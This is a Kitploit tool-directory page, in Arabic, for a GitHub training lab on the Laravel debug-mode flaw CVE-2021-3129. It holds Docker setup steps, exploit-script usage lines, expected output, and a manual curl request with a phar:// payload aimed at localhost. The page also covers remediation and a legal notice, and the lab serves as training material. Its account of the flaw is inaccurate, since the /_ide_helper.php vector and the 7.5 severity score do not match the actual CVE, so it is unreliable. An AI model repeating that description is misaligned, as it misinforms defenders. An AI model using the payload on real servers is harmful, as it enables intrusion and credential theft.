Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: استغلال وضع التصحيح في Laravel (RCE) - مختبر استغلال كامل مع إكسبلويت بلغة Python، وحاوية Docker، ودليل تحليل أمني. | Kitploit
أدوات/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: استغلال وضع التصحيح في Laravel (RCE) - مختبر استغلال كامل مع إكسبلويت بلغة Python، وحاوية Docker، ودليل تحليل أمني.

عرض المستودع
18منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-3129: مختبر RCE لوضع تصحيح Laravel

License: MIT Python 3.8+ Docker CVSS: 7.5

مختبر عملي لاستغلال CVE-2021-3129 - ثغرة حرجة في Laravel تسمح بقراءة ملفات دون مصادقة مع احتمالية تنفيذ أوامر عن بُعد (RCE).

بدء سريع

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

ما هي CVE-2021-3129؟

الخاصيةالتفاصيل
الخطورةCVSS 7.5 (عالية)
الإصدارات المتأثرةLaravel < 8.4.2, < 7.30.4
الأثرقراءة ملفات تعسفية، كشف معلومات، احتمالية RCE
مصادقة مطلوبةلا
ناقل الهجومالشبكة

كيف يعمل

  1. الاستطلاع - تحديد Laravel مع تفعيل وضع التصحيح
  2. التحقق - اختبار نقطة النهاية /_ide_helper.php
  3. الاستغلال - استخدام غلاف phar:// لقراءة الملفات
  4. الأثر - استخراج بيانات الاعتماد ومفاتيح API ومتغيرات البيئة

المتطلبات الأساسية

  • Docker Desktop
  • Python 3.8+
  • 4GB رام

الإعداد (خطوة بخطوة)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

المخرجات المتوقعة

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

استخدام سكربت الاستغلال

root@kitploit:~
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

الاختبار اليدوي

root@kitploit:~
# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

المعالجة

root@kitploit:~
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

التنظيف

root@kitploit:~
# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

الأسئلة الشائعة

س: هل يمكنني الاختبار على الإنترنت؟
ج: لا. هذا مخصص لـ localhost فقط. لا تختبر أبدًا على أنظمة لا تملكها.

س: هل يعمل هذا على الإصدارات المُصحّحة؟
ج: لا. تم تصحيح Laravel 8.4.2+ و7.30.4+.

س: هل يمكنني تعديل سكربت الاستغلال؟
ج: نعم. الكود مُعلّق بالكامل لأغراض التعلم.

س: كيف ألتقط حركة مرور الشبكة؟
ج: استخدم tcpdump أو Wireshark:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

إشعار قانوني

⚠️ لأغراض تعليمية فقط

✅ الاستخدامات المصرح بها:

  • التعلم التعليمي
  • اختبار الأمان المصرح به
  • البحث الدفاعي

❌ الاستخدامات المحظورة:

  • الوصول غير المصرح به للأنظمة
  • الاختراق غير القانوني
  • إلحاق الضرر بالأنظمة

استخدم فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

الموارد

  • CVE-2021-3129
  • أمان Laravel
  • مغلّفات PHP

المؤلف

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • الموقع: بنغالور، كارناتاكا، الهند

الترخيص

رخصة MIT - انظر ملف LICENSE

تنزيل الأداة